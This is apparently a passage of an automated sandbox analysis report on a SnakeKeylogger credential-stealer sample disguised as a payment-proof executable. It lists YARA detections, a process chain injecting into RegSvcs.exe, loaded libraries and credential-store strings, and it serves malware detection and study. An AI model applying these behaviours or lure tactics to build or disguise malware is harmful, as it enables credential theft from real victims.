Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067C0B30	7_2_067C0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067C17A0	7_2_067C17A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067C9C70	7_2_067C9C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067CFC68	7_2_067CFC68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067C5028	7_2_067C5028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067CF810	7_2_067CF810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067C2968	7_2_067C2968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067C9548	7_2_067C9548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067C1E70	7_2_067C1E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067CE258	7_2_067CE258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067CE24B	7_2_067CE24B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067CDE00	7_2_067CDE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067CEAF8	7_2_067CEAF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067CE6B0	7_2_067CE6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067CE6AF	7_2_067CE6AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067CE6A0	7_2_067CE6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067CEF60	7_2_067CEF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067CEF51	7_2_067CEF51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067C9328	7_2_067C9328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067C0B28	7_2_067C0B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067C9B1E	7_2_067C9B1E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067CEB08	7_2_067CEB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067CF3B8	7_2_067CF3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067CF3A8	7_2_067CF3A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067C8BA0	7_2_067C8BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067C8B91	7_2_067C8B91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067C178F	7_2_067C178F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067C0040	7_2_067C0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067C0038	7_2_067C0038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067C5018	7_2_067C5018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067CF803	7_2_067CF803
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067CD0F8	7_2_067CD0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067CCCA0	7_2_067CCCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067CCC8F	7_2_067CCC8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067C295B	7_2_067C295B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067CD550	7_2_067CD550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067CD540	7_2_067CD540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067CDDFF	7_2_067CDDFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067CDDF1	7_2_067CDDF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067CD9A8	7_2_067CD9A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067CD999	7_2_067CD999

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: String function: 00FD6AC0 appears 42 times
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: String function: 00FCEC2F appears 68 times
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: String function: 00FDF8A0 appears 35 times

Source: z30ProofofPaymentAttached.exe, 00000001.00000003.1283780330.00000000036DD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs z30ProofofPaymentAttached.exe
Source: z30ProofofPaymentAttached.exe, 00000001.00000003.1287142771.0000000003533000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs z30ProofofPaymentAttached.exe
Source: z30ProofofPaymentAttached.exe, 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs z30ProofofPaymentAttached.exe

Source: z30ProofofPaymentAttached.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: z30ProofofPaymentAttached.exe PID: 7304, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7712, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, z---W.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, z---W.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/2@4/4

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_00FFCE7A GetLastError,FormatMessageW,

1_2_00FFCE7A

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FEAB84 AdjustTokenPrivileges,CloseHandle,		1_2_00FEAB84
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FEB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		1_2_00FEB134

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_00FFE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

1_2_00FFE1FD

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_00FF6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,

1_2_00FF6532

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_0100C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,

1_2_0100C18C

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_00FB406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

1_2_00FB406B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

File created: C:\Users\user~1\AppData\Local\Temp\aut719C.tmp

Jump to behavior

Source: z30ProofofPaymentAttached.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegSvcs.exe, 00000007.00000002.3733442866.00000000030A2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003093000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.00000000030D6000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: z30ProofofPaymentAttached.exe

ReversingLabs: Detection: 31%

Source: unknown	Process created: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe "C:\Users\user\Desktop\z30ProofofPaymentAttached.exe"
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\z30ProofofPaymentAttached.exe"
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\z30ProofofPaymentAttached.exe"	Jump to behavior

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: z30ProofofPaymentAttached.exe

Static file information: File size 1073152 > 1048576

Source: z30ProofofPaymentAttached.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: z30ProofofPaymentAttached.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: z30ProofofPaymentAttached.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: z30ProofofPaymentAttached.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: z30ProofofPaymentAttached.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: z30ProofofPaymentAttached.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: z30ProofofPaymentAttached.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: z30ProofofPaymentAttached.exe, 00000001.00000003.1286744686.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, z30ProofofPaymentAttached.exe, 00000001.00000003.1287142771.0000000003410000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: z30ProofofPaymentAttached.exe, 00000001.00000003.1286744686.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, z30ProofofPaymentAttached.exe, 00000001.00000003.1287142771.0000000003410000.00000004.00001000.00020000.00000000.sdmp

Source: z30ProofofPaymentAttached.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: z30ProofofPaymentAttached.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: z30ProofofPaymentAttached.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: z30ProofofPaymentAttached.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: z30ProofofPaymentAttached.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_00FCE01E LoadLibraryA,GetProcAddress,

1_2_00FCE01E

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FD6B05 push ecx; ret	1_2_00FD6B18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0141A0E8 pushad ; retf 0002h	7_2_0141A0EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01419089 push ebx; retf 0002h	7_2_0141908A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0141A088 pushad ; retf 0002h	7_2_0141A0EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01419459 push esi; retf 0002h	7_2_0141945A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01419468 push esi; retf A802h	7_2_0141961A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01418481 push ecx; retf 0002h	7_2_01418482
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01418490 push edx; retf 0002h	7_2_01418EEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01419611 push edi; retf 0002h	7_2_01419612
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01419DE0 pushad ; retf 0002h	7_2_0141A02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067C9243 push es; ret	7_2_067C9244

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_01018111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		1_2_01018111
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FCEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		1_2_00FCEB42

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_00FD123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00FD123A

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
